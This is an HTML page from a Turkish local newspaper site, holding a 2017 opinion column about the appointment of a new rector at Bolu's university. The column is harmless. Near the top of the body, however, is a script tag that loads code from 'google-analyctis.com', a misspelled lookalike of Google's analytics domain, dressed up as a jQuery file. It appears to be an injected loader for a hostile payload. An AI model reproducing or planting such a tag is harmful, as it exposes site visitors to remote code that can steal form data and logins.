<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="tr-TR" itemscope itemtype="http://schema.org/Article">
<head>
<base href="http://www.bolugundem.com/" target="_self"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Refresh" content="300" />
<title>Yeni Rektörümüz Atanıyor - Nizamettin YILDIRIM</title>
<meta name="keywords" content="Nizamettin YILDIRIM" />
<meta name="description" content="Hayri Coşkun’un istifasıyla boşalan rektörlük makamına YÖK’ün 25.5.2017 tarihinde açtığı ilana müracaatlar 9.6.2017 tarihinde sona erdi...." />
<link rel="canonical" href="http://www.bolugundem.com/yeni-rektorumuz-ataniyor-15538yy.htm" />
<link rel="alternate" href="http://www.bolugundem.com/mobi/author_article_detail.php?id=15538" media="only screen and (max-width: 640px)" />
<link rel="image_src" type="image/jpeg" href="http://www.bolugundem.com/d/author/395_b.jpg" />
<meta name="DC.date.issued" content="2017-06-23T18:23:00+03:00" />
<meta property="og:site_name" content="Bolu Gündem Gazetesi" />
<meta property="og:url" content="http://www.bolugundem.com/yeni-rektorumuz-ataniyor-15538yy.htm" />
<meta property="og:title" content="Yeni Rektörümüz Atanıyor - Nizamettin YILDIRIM" />
<meta property="og:description" content="Hayri Coşkun’un istifasıyla boşalan rektörlük makamına YÖK’ün 25.5.2017 tarihinde açtığı ilana müracaatlar 9.6.2017 tarihinde sona erdi...." />
<meta property="og:image" content="http://www.bolugundem.com/d/author/395_b.jpg" />
<meta property="og:type" content="article" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:site" content="@">
<meta name="twitter:url" content="http://www.bolugundem.com/yeni-rektorumuz-ataniyor-15538yy.htm" />
<meta name="twitter:title" content="Yeni Rektörümüz Atanıyor - Nizamettin YILDIRIM" />
<meta name="twitter:description" content="Hayri Coşkun’un istifasıyla boşalan rektörlük makamına YÖK’ün 25.5.2017 tarihinde açtığı ilana müracaatlar 9.6.2017 tarihinde sona erdi...." />
<meta name="twitter:image" content="http://www.bolugundem.com/d/author/395_b.jpg" />
<meta itemprop="thumbnailUrl" content="http://www.bolugundem.com/d/author/395_s.jpg" />
<meta itemprop="articleSection" content="Yazarlar" />
<meta itemprop="dateCreated" content="1970-01-01T02:00:00+02:00" />
<link href="http://www.bolugundem.com/s/style.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://www.bolugundem.com/s/function.js"></script><meta name="google-site-verification" content="_3Ay3IQ64zgnagdr5ShjUTUQtGr6MxenZ5w_W5i7_ok" /></head>
<body class="body_main">
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-59291068-1', 'auto');
  ga('send', 'pageview');
</script><div class="CM_pageskin"><div class="left"><div class="banner_code"><a href="http://kareinsaatproje.com.tr/" target=""><img src="http://www.bolugundem.com/d/banner/qqq.20170623063655.jpg" width="175" height="300" border="0" alt=""/></a>

<a style="display: block; background-image: url('http://www.bolugundem.com/d/banner/otoilan.png'); background-color: transparent; width: 175px; height: 40px; background-repeat: no-repeat;" width="300" height="40" href="http://www.bolugundem.com/oto-ilan-7s.htm"></a>

<iframe width="175" height="400" frameborder="0" border="0" scrolling="no" marginheight="1" marginwidth="1" src="http://www.ahmetotogaleri.com/otoilan_frame.php" name="otoilan">
</iframe></div></div><div class="right"><div class="banner_code"><a href="http://www.finalegitim.com.tr" target="_blank"><img src="http://www.bolugundem.com/d/banner/final-haziran2016.20160720131739.jpg" width="175" height="320" border="0" alt=""/></a>

<a href="" target=""><img src="http://www.bolugundem.com/d/banner/focus175x350.gif" width="175" height="320" border="0" alt=""/></a></div></div></div><div class="main_container"><div class="base_topbar_outer"><div class="base_topbar base_position"><ul class="quick_launch"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="parent"><a href="http://www.bolugundem.com/guest_book.php" target="_self">Ziyaretçi Defteri</a></li><li class="parent"><a href="http://www.bolugundem.com/sitene-ekle.htm" target="_self">Sitene Ekle</a></li><li class="parent"><a href="http://www.bolugundem.com/search_result.php" target="_self">Arşiv</a></li><li class="sole"><a href="http://www.bolugundem.com/e_gazette.php" target="_self">E- Gazete</a></li><li class="parent"><a href="#" target="_self" onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.bolugundem.com');return false;">Anasayfam Yap</a></li></ul><div class="currency_slider" id="currency_slider"><div class="viewport"><ul class="overview"><li class="down"><span><b>BIST</b> 99.639</span></li><li class="up"><span><b>Altın</b> 141,639</span></li><li class="down"><span><b>Dolar</b> 3,5035</span></li><li class="up"><span><b>Euro</b> 3,9239</span></li></ul></div></div><div class="weather_slider" id="weather_slider"><div class="viewport"><ul class="overview"><li style="background-position: -3px -870px;"><span>Bolu</span> 27 °C</li><li style="background-position: -3px -928px;"><span>İstanbul</span> 28 °C</li><li style="background-position: -3px -870px;"><span>Ankara</span> 25 °C</li></ul></div></div><form action="search_result.php" method="get"><input class="search_input" type="text" name="search_key" placeholder="Site içi arama" /><input class="search_button" type="submit" value="" /></form></div></div><div class="base_outer clearfix"><div class="base_top base_position"><div class="logo"><a href="http://www.bolugundem.com/" rel="home"><img src="http://www.bolugundem.com/s/i/logo.png" alt="Bolu Gündem Gazetesi" width="250" height="130" /></a></div><div class="banner_spec"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/logo-erdal.20170307113015.png" width="220" height="122" border="0" alt=""/></a></div><div class="banner"><object width="480" height="130" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"><param name="movie" value="http://www.bolugundem.com/d/banner/beypilic-logo-yani-reklam-erdal.20170531101251.swf?clickTag=http%3A//www.beypilic.com.tr/"><param name="quality" value="high"><param name="scale" value="exactfit"><embed width="480" height="130" src="http://www.bolugundem.com/d/banner/beypilic-logo-yani-reklam-erdal.20170531101251.swf?clickTag=http%3A//www.beypilic.com.tr/" quality="high" scale="exactfit" bgcolor="#FFFFFF" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object></div><div class="nav-mini"><a href="http://www.bolugundem.com/" title="Anasayfa" rel="home"></a></div><div class="nav-mini-2"><a href="http://www.bolugundem.com/foto-galeri.htm" title="Foto Galeri"></a><a href="http://www.bolugundem.com/video-galeri.htm" title="Video Galeri"></a></div><div class="last_min" id="last_min"><div class="viewport"><ul class="overview"><li><a href="http://www.bolugundem.com/genc-sporcular-kaynasiyor-107513h.htm">Genç sporcular kaynaşıyor</a></li><li><a href="http://www.bolugundem.com/ilahilerle-mest-etti-107512h.htm">İlahilerle Mest Etti</a></li><li><a href="http://www.bolugundem.com/ramazan-ozel-sayfasi-106943h.htm">Ramazan özel sayfası</a></li><li><a href="http://www.bolugundem.com/bir-istegim-var-107511h.htm">BİR İSTEĞİM VAR!</a></li><li><a href="http://www.bolugundem.com/bolu-karanfil-uretiminde-antalya-bolgesine-rakip-oldu-107510h.htm">Bolu karanfil üretiminde Antalya bölgesine rakip oldu</a></li><li><a href="http://www.bolugundem.com/vezneler-bayramin-2-ve-3-gunu-acik-olacak-107509h.htm">Vezneler  bayramın 2.ve 3. günü açık olacak</a></li><li><a href="http://www.bolugundem.com/geredede-kaza-1-olu-107506h.htm">Gerede’de kaza 1 ölü</a></li><li><a href="http://www.bolugundem.com/favoriler-hata-yapmadi-107503h.htm">Favoriler hata yapmadı</a></li><li><a href="http://www.bolugundem.com/goynukte-sakal-i-serif-heyecani-107502h.htm">Göynük’te Sakal-I Şerif heyecanı</a></li><li><a href="http://www.bolugundem.com/sebenspor-devlere-kafa-tutuyor-107498h.htm">Sebenspor devlere kafa tutuyor</a></li><li><a href="http://www.bolugundem.com/devlet-hastanesinde-whatsapp-cozum-hatti-107496h.htm">Devlet hastanesinde WhatsApp Çözüm Hattı</a></li><li><a href="http://www.bolugundem.com/turkiyenin-en-iyi-kamp-yeri-107508h.htm">Türkiye’nin en iyi kamp yeri</a></li><li><a href="http://www.bolugundem.com/kibrisli-atlet-boluda-rekora-kostu-107504h.htm">Kıbrıslı Atlet, Bolu’da rekora koştu</a></li><li><a href="http://www.bolugundem.com/bolulu-fenerbahceliler-duzceye-akacak-107497h.htm">Bolulu Fenerbahçeliler Düzce’ye akacak</a></li><li><a href="http://www.bolugundem.com/avrupa-oncesi-bolu-107505h.htm">Avrupa öncesi Bolu</a></li></ul></div></div><div class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="sep2"></li><li class="item parent"><a class="inr" href="http://www.bolugundem.com/resmi-ilanlar-haberleri-14hk.htm" target="_self"><span>RESMİ İLANLAR</span></a></li><li class="sep"></li></ul></div><div class="banner wide_banner"><div class="inner" id="banner_logo_bottom"><a href="https://www.youtube.com/erpilictavukculuk" target=""><img src="http://www.bolugundem.com/d/banner/1000x120-v-3.20170531131619.gif" width="1000" height="120" border="0" alt=""/></a></div></div></div><div class="base_outer"><div id="base" class="base base_position clearfix"><div id="base_middle" class="base_middle"><div class="middle_content_title"><h1 itemprop="name">Yeni Rektörümüz Atanıyor</h1></div><div class="middle_content_top"><div class="top_social"><script type="text/javascript">showBookmark3();</script></div><div class="nav" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://www.bolugundem.com/" rel="home"><span itemprop="title">Ana Sayfa</span></a><span itemprop="child" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">&raquo; <a itemprop="url" href="http://www.bolugundem.com/yazarlar.htm" rel="self"><span itemprop="title">Yazarlar</span></a><span itemprop="child" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">&raquo; <a itemprop="url" href="http://www.bolugundem.com/nizamettin-yildirim-395y.htm" rel="self"><span itemprop="title">Nizamettin YILDIRIM</span></a></span></span></div><div class="text_size"><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#author_article_content', 'd');" title="Yazıyı küçült" width="24" height="18" alt="" /><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#author_article_content', 'u');" title="Yazıyı büyüt" width="24" height="18" alt="" /></div><div class="tools"><a class="go_comment" rel="nofollow" href="#" onclick="$.scrollTo('.comment_add', 600); return false;" target="_blank" title="Yorum Yap"></a><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=2&amp;id=15538');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=2&amp;id=15538')" title="Yazdır"></a></div><div class="top_date" itemprop="datePublished" content="2017-06-23T18:23:00+03:00">23.06.2017 18:23</div></div><div class="middle_content"><div class="author_article_detail"><div class="image"><img itemprop="image" src="http://www.bolugundem.com/d/author/395_b.jpg" alt="Nizamettin YILDIRIM" width="200" height="200" /></div><div class="title"><h3 itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name">Nizamettin YILDIRIM</span> / ÖNERİ</h3></div><div class="email"><span><script type="text/javascript">document.write('<n uers="znvygb:" ery="absbyybj"></n>'.replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);}));</script></span></div><div itemprop="articleBody" id="author_article_content" class="text_content"><p>Hayri Coşkun’un istifasıyla boşalan rektörlük makamına YÖK’ün 25.5.2017 tarihinde açtığı ilana müracaatlar 9.6.2017 tarihinde sona erdi. Bu tarih itibariyle 19 adayın müracaatı var.<br />Yeni sisteme göre seçimlerin birinci aşaması yapılmayacak, üç adayın ismi Cumhurbaşkanına gidecek ve birisi atanacak.<br />Adaylar arasında Bolu’lu bir aday da var. Aslında doğma büyüme Bolu’lu değil. Düzce Bıçkıyanı köyü doğumlu ancak daha sonra Bolu’da yakın tarihte mahalle olan Seyit köyü’ne yerleşmişler. Avusturya’da çalışan bir işçi çocuğu. Düzce’nin depremden sonra il olduğunu düşünürsek Bolu’lu diyebiliriz.&nbsp;<br />Daha önceki rektörlerin içinde de Kemal Güçlüol Gerede’liydi.&nbsp;<br />Bu konuyu yazmamdaki amacım mikro milliyetçilik yapmak değil. Ayrıca rektör adayı Mustafa Çakır’ı tanımıyorum. Sadece internette kısa bir araştırma yaptım. Bilimsel altyapısı dolu bir akademisyen.&nbsp;<br />Üniversitemizin rektörünün neden Bolu’lu olmasını birkaç gerekçe ile açıklayayım.<br />Bolu gibi küçük bir yerde kurulan üniversitelere akademik kişiler pek rağbet etmez. Çünkü köklü ve büyük şehirlerde kurulan üniversitelerin imkanları daha geniş, özel iş ve araştırma yapmaları daha kolaydır.<br />Yeni kurulmuş üniversitelere gelen akademik personelin önemli bir kısmı da bulundukları yerlerde kadro alamayan öğretim üyeleri oluşturmaktadır.<br />Bir diğer gerekçe ise, yeni seçilen rektörler en son çalıştığı üniversiteden yakın arkadaşlarını yada çevresini transfer ederek kadroları doldururlar.<br />Hal böyle olunca buraya gelip kadro alan akademisyenler belli bir süre sonra kendilerine başka üniversitelerden yer arayıp ilk fırsatta Bolu’dan ayrılmayı düşünüyorlar.<br />Özellikle tıp fakültesindeki öğretim elemanları haklı olarak bu düşüncedeler, ilk fırsatta daha iyi imkanlar sunan büyük şehirlerdeki üniversitelere gitmek istiyorlar. Tıp fakültesi alt yapı ve hastane olarak bir çok emsal fakülteden daha iyi donanıma sahip olduğu halde halen daha bazı branşlarda öğretim üyesi eksik. En büyük gerekçe de yukarıda saydığım sebeplerdir.<br />Üniversiteye gelmek isteyen akademisyenlerden memleketi Bolu olanlara öncelik verilmeli. Çünkü insan memleketine daha bir özveriyle bakıyor. Ben de 20 yıl sonra memleketime geldim. Artık kovsalar da başka yere gitmem. Yapacaklarım, elimden gelen çalışmalarım Bolu’ya yararlı olabilirse ne mutlu bana diye düşünüyorum.<br />Geçtiğimiz yıllarda bir hemşehrimiz, kendisi kadın doğum uzmanı doçent, başarılı da bir doktor müracaat eder. Dönemin rektörüyle aynı üniversitede çalışmış. Yıllar sonra memleketine gelmek istiyor ve diyor ki “burası benim memleketim artık buradan başka bir yer aramam, hem de özveriyle çalışır sahip çıkarım” diyor. İşin içine kayırmacılık, siyaset vs. giriyor. Başlıyorlar sormaya. Filancayı tanıyor musun, olmadı diğerini tanıyor musun diyerek kendi kafalarında olmadıklarına kanaat getirerek almıyorlar. Şu anda başka bir üniversitede çalışıyor. Neden bu memleketin çocukları Bolu’ya hizmet etmesinler.<br />Rektör adayları arasında Bolu’lu bir aday görünce ümitlendim. İnşallah atanır da üniversitemizi layık olduğu noktalara getirir. Bu memleketin çocuklarını istihdam ederek üniversitemizi ilk sıralara taşır.&nbsp;<br />Sadece kendi isteğiyle gelenleri değil, diğer üniversitelerde başarılı öğretim elemanlarını da davet ederek üniversitemizi güçlendirmeli.<br />Siyasiler artık Bolu’ya ağırlık versinler. Üniversitemiz artık bizim her şeyimiz oldu.<br />Yetişmiş insanlarımıza sahip çıkalım, biz kazanırız.</p><p>&nbsp;</p></div><div class="clear"></div><div class="read_count" itemprop="interactionCount">Bu yazı toplam 27 defa okunmuştur.</div></div><script type="text/javascript">showBookmark5("https://www.facebook.com/bolugundem", "", "");</script><div class="comment_navigation"><div class="container"><div class="tools"><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=2&amp;id=15538');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=2&amp;id=15538')" title="Yazdır"></a><a class="go_top" rel="nofollow" href="/yeni-rektorumuz-ataniyor-15538yy.htm#top" onclick="scrollPage(0); return false;" title="Yukarı"></a></div><script type="text/javascript">showBookmark4();</script></div></div><div class="comment_add"><form method="post" id="comment_form" onsubmit="return addComment(2, 15538);"><textarea name="comment_content" id="comment_content" class="comment_content" rows="6" placeholder="Yorumunuz" maxlength="500"></textarea><input type="text" name="member_name" id="member_name" class="member_name" placeholder="Adınız" /><input type="submit" name="comment_submit" id="comment_submit" class="comment_submit" value="GÖNDER" /><input type="hidden" name="reply" id="reply" value="0" /><div class="reply_to"></div></form><div class="info"><b>UYARI:</b> Küfür, hakaret, rencide edici cümleler veya imalar, inançlara saldırı içeren, imla kuralları ile yazılmamış,<br /> Türkçe karakter kullanılmayan ve büyük harflerle yazılmış yorumlar onaylanmamaktadır.</div></div><div class="comment"><div class="container"><div class="content" align="center">Bu yazıya henüz yorum eklenmemiştir.</div></div><div class="btm"></div></div><div class="middle_sub_page_title"><span>Yazarın Diğer Yazıları</span></div><ul class="author_article_other"><li><a href="http://www.bolugundem.com/on-bir-ayin-sultani-15524yy.htm">ON BİR AYIN SULTANI</a><span>11 Haziran 2017 Pazar 11:47</span></li><li><a href="http://www.bolugundem.com/terkedilmis-bina-ve-insaatlar-15490yy.htm">Terkedilmiş Bina ve İnşaatlar</a><span>07 Mayıs 2017 Pazar 17:05</span></li><li><a href="http://www.bolugundem.com/kader-oylamasi-15466yy.htm">Kader Oylaması</a><span>15 Nisan 2017 Cumartesi 04:47</span></li><li><a href="http://www.bolugundem.com/kimin-tercihi-ne-15432yy.htm">Kimin Tercihi Ne?</a><span>17 Mart 2017 Cuma 10:00</span></li><li><a href="http://www.bolugundem.com/referandumda-son-durum-15418yy.htm">Referandumda Son Durum</a><span>02 Mart 2017 Perşembe 14:19</span></li><li><a href="http://www.bolugundem.com/ben-neden-teroristlerle-beraberim-15409yy.htm">Ben Neden Teröristlerle Beraberim?</a><span>24 Şubat 2017 Cuma 09:50</span></li><li><a href="http://www.bolugundem.com/bu-ulke-hepimizin-15393yy.htm">Bu Ülke Hepimizin</a><span>09 Şubat 2017 Perşembe 14:39</span></li><li><a href="http://www.bolugundem.com/her-durumda-sukretmek-15385yy.htm">Her Durumda Şükretmek</a><span>02 Şubat 2017 Perşembe 15:04</span></li><li><a href="http://www.bolugundem.com/evet-mi-hayir-mi-15377yy.htm">Evet mi Hayır mı?</a><span>27 Ocak 2017 Cuma 09:55</span></li><li><a href="http://www.bolugundem.com/dunden-bugune-15365yy.htm">Dünden Bugüne</a><span>19 Ocak 2017 Perşembe 10:27</span></li></ul><div class="middle_sub_page_title author_link"><a href="http://www.bolugundem.com/nizamettin-yildirim-395y.htm">Yazarın Tüm Yazıları &raquo;</a></div><div class="latest_gallery"><div class="caption">SON EKLENEN <span>GALERİLER</span></div><ul class="content"><li><a class="image icon_1" href="http://www.bolugundem.com/yap-boz-tahtasina-dondu-2221g.htm"><img src="http://www.bolugundem.com/d/gallery/2221_s.jpg" alt="Yap boz tahtasına döndü" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/yap-boz-tahtasina-dondu-2221g.htm">Yap boz tahtasına döndü</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/geredede-kaza-1-olu-2220g.htm"><img src="http://www.bolugundem.com/d/gallery/2220_s.jpg" alt="Gerede’de kaza 1 ölü" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/geredede-kaza-1-olu-2220g.htm">Gerede’de kaza 1 ölü</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/7-gunde-boluda-toplandilar-2219g.htm"><img src="http://www.bolugundem.com/d/gallery/2219_s.jpg" alt="7. günde Bolu’da toplandılar" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/7-gunde-boluda-toplandilar-2219g.htm">7. günde Bolu’da toplandılar</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/kucuk-yastaki-surucu-yakalanamadi-2218g.htm"><img src="http://www.bolugundem.com/d/gallery/2218_s.jpg" alt="Küçük yaştaki sürücü yakalanamadı" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/kucuk-yastaki-surucu-yakalanamadi-2218g.htm">Küçük yaştaki sürücü yakalanamadı</a></li></ul></div></div></div><div id="base_side" class="base_side"><div class="banner side_banner"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/qqq.20170531103532.jpg" width="300" height="300" border="0" alt=""/></a></div><div class="side_caption"><span>ÜYE İŞLEMLERİ</span></div><div class="side_content"><div class="member_box" id="loginbox_container"></div></div><div class="side_content_bottom"></div><div class="side_caption side_caption_2"><a href="http://www.bolugundem.com/yazarlar.htm">YAZARLAR</a></div><div class="side_content"><div class="author_side" id="author_side_1"><div class="viewport"><ul class="overview"><li><a class="content" href="http://www.bolugundem.com/yeni-rektorumuz-ataniyor-15538yy.htm">Nizamettin YILDIRIM<span>Yeni Rektörümüz Atanıyor</span></a><a class="image" href="http://www.bolugundem.com/yeni-rektorumuz-ataniyor-15538yy.htm"><img src="http://www.bolugundem.com/d/author/395_s.jpg" alt="Nizamettin YILDIRIM" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/bir-istegim-var-15537yy.htm">Onur USTAOĞLU<span>BİR İSTEĞİM VAR!</span></a><a class="image" href="http://www.bolugundem.com/bir-istegim-var-15537yy.htm"><img src="http://www.bolugundem.com/d/author/431_s.jpg" alt="Onur USTAOĞLU" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/orselenen-anayasal-haklarimiz-15536yy.htm">İlhami Candemir<span>Örselenen anayasal haklarımız</span></a><a class="image" href="http://www.bolugundem.com/orselenen-anayasal-haklarimiz-15536yy.htm"><img src="http://www.bolugundem.com/d/author/402_s.jpg" alt="İlhami Candemir" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/okullar-tatil-olurken-15535yy.htm">Mustafa Namdar<span>Okullar Tatil Olurken</span></a><a class="image" href="http://www.bolugundem.com/okullar-tatil-olurken-15535yy.htm"><img src="http://www.bolugundem.com/d/author/10_s.jpg" alt="Mustafa Namdar" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/suleymaniye-talebe-yurdunda-iftar-15534yy.htm">Cevat Özsoy<span>Süleymaniye talebe yurdunda iftar</span></a><a class="image" href="http://www.bolugundem.com/suleymaniye-talebe-yurdunda-iftar-15534yy.htm"><img src="http://www.bolugundem.com/d/author/425_s.jpg" alt="Cevat Özsoy" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/arti-eksi-15533yy.htm">Aydın Hitit<span>ARTI-EKSİ</span></a><a class="image" href="http://www.bolugundem.com/arti-eksi-15533yy.htm"><img src="http://www.bolugundem.com/d/author/348_s.jpg" alt="Aydın Hitit" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/yaklasan-kadir-gecesi-ve-yeseren-umitlerim-15531yy.htm">Hasan Dinç<span>YAKLAŞAN KADİR GECESİ VE YEŞEREN ÜMİTLERİM</span></a><a class="image" href="http://www.bolugundem.com/yaklasan-kadir-gecesi-ve-yeseren-umitlerim-15531yy.htm"><img src="http://www.bolugundem.com/d/author/354_s.jpg" alt="Hasan Dinç" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/bolu-yonetenlerinin-feto-iliskileri-ve-hayri-coskun-15528yy.htm">Hüseyin KAYA<span>Bolu Yönetenlerinin Fetö İlişkileri ve Hayri Coşkun</span></a><a class="image" href="http://www.bolugundem.com/bolu-yonetenlerinin-feto-iliskileri-ve-hayri-coskun-15528yy.htm"><img src="http://www.bolugundem.com/d/author/391_s.jpg" alt="Hüseyin KAYA" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/adim-delice-olea-europea-var-oleaster-15525yy.htm">Suat Tosun<span>ADIM   DELİCE  (Olea europea var. oleaster ) …</span></a><a class="image" href="http://www.bolugundem.com/adim-delice-olea-europea-var-oleaster-15525yy.htm"><img src="http://www.bolugundem.com/d/author/380_s.jpg" alt="Suat Tosun" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/adalet-diyemedim-15508yy.htm">Makinist<span>Adalet diyemedim</span></a><a class="image" href="http://www.bolugundem.com/adalet-diyemedim-15508yy.htm"><img src="http://www.bolugundem.com/d/author/386_s.jpg" alt="Makinist" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm">Aykut Karagüzel<span>A İ D İ Y E T    D U Y G  U S U - 2</span></a><a class="image" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm"><img src="http://www.bolugundem.com/d/author/330_s.jpg" alt="Aykut Karagüzel" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm">Şenda Aksungur<span>Kardelen Kültür ve Sanat sarayına kavuşacak mıyız?</span></a><a class="image" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm"><img src="http://www.bolugundem.com/d/author/382_s.jpg" alt="Şenda Aksungur" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm">Bülent Dinçtürk<span>BELEDİYELER VATANA İHANET ETME YERİ DEĞİLDİR</span></a><a class="image" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm"><img src="http://www.bolugundem.com/d/author/55_s.jpg" alt="Bülent Dinçtürk" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm">A. Şerafettin Şenyüz<span>Fani Dünya’ya devam (45)</span></a><a class="image" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm"><img src="http://www.bolugundem.com/d/author/351_s.jpg" alt="A. Şerafettin Şenyüz" width="45" height="54" /></a></li></ul></div><div class="side_tiny_pager"><div class="buttons prev" title="Geri"></div><div class="pager"><span class="pagenum" data-index="0">1</span><span class="pagenum" data-index="1">2</span><span class="pagenum" data-index="2">3</span></div><div class="buttons next" title="İleri"></div></div></div></div><div class="side_content_bottom"></div><div class="side_caption side_caption_3"><a href="http://www.bolugundem.com/foto-galeri.htm">FOTO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="gallery_side"><li class="item"><a href="http://www.bolugundem.com/yap-boz-tahtasina-dondu-2221g.htm"><img src="http://www.bolugundem.com/d/gallery/2221_s.jpg" alt="Yap boz tahtasına döndü" width="127" height="96" /><span class="tl"></span><span class="wrapword">Yap boz tahtasına döndü</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/geredede-kaza-1-olu-2220g.htm"><img src="http://www.bolugundem.com/d/gallery/2220_s.jpg" alt="Gerede’de kaza 1 ölü" width="127" height="96" /><span class="tl"></span><span class="wrapword">Gerede’de kaza 1 ölü</span></a></li><li class="item"><a href="http://www.bolugundem.com/7-gunde-boluda-toplandilar-2219g.htm"><img src="http://www.bolugundem.com/d/gallery/2219_s.jpg" alt="7. günde Bolu’da toplandılar" width="127" height="96" /><span class="tl"></span><span class="wrapword">7. günde Bolu’da toplandılar</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/kucuk-yastaki-surucu-yakalanamadi-2218g.htm"><img src="http://www.bolugundem.com/d/gallery/2218_s.jpg" alt="Küçük yaştaki sürücü yakalanamadı" width="127" height="96" /><span class="tl"></span><span class="wrapword">Küçük yaştaki sürücü yakalanamadı</span></a></li></ul><div class="side_content_pager gallery_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="side_caption"><a href="http://www.bolugundem.com/video-galeri.htm">VİDEO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="video_side"><li class="item"><a href="http://www.bolugundem.com/turizmde-marka-olmaya-kararliyiz-141v.htm"><img src="http://www.bolugundem.com/d/video/141.jpg" alt="“Turizmde marka olmaya kararlıyız”" width="127" height="96" /><span class="tl"></span><span class="wrapword">“Turizmde marka olmaya kararlıyız”</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/dortdivan-140v.htm"><img src="http://www.bolugundem.com/d/video/140.jpg" alt="DÖRTDİVAN" width="127" height="96" /><span class="tl"></span><span class="wrapword">DÖRTDİVAN</span></a></li><li class="item"><a href="http://www.bolugundem.com/seben-tanitim-filmi-139v.htm"><img src="http://www.bolugundem.com/d/video/139.jpg" alt="Seben tanıtım filmi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Seben tanıtım filmi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/29-ekim-cumhuriyet-bayraminiz-kutlu-olsun-138v.htm"><img src="http://www.bolugundem.com/d/video/138.jpg" alt="29 Ekim Cumhuriyet Bayramınız Kutlu Olsun" width="127" height="96" /><span class="tl"></span><span class="wrapword">29 Ekim Cumhuriyet Bayramınız Kutlu Olsun</span></a></li></ul><div class="side_content_pager video_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="side_cat_news"></div></div></div></div><div class="base_outer"><div class="base_bottom base_position"><div 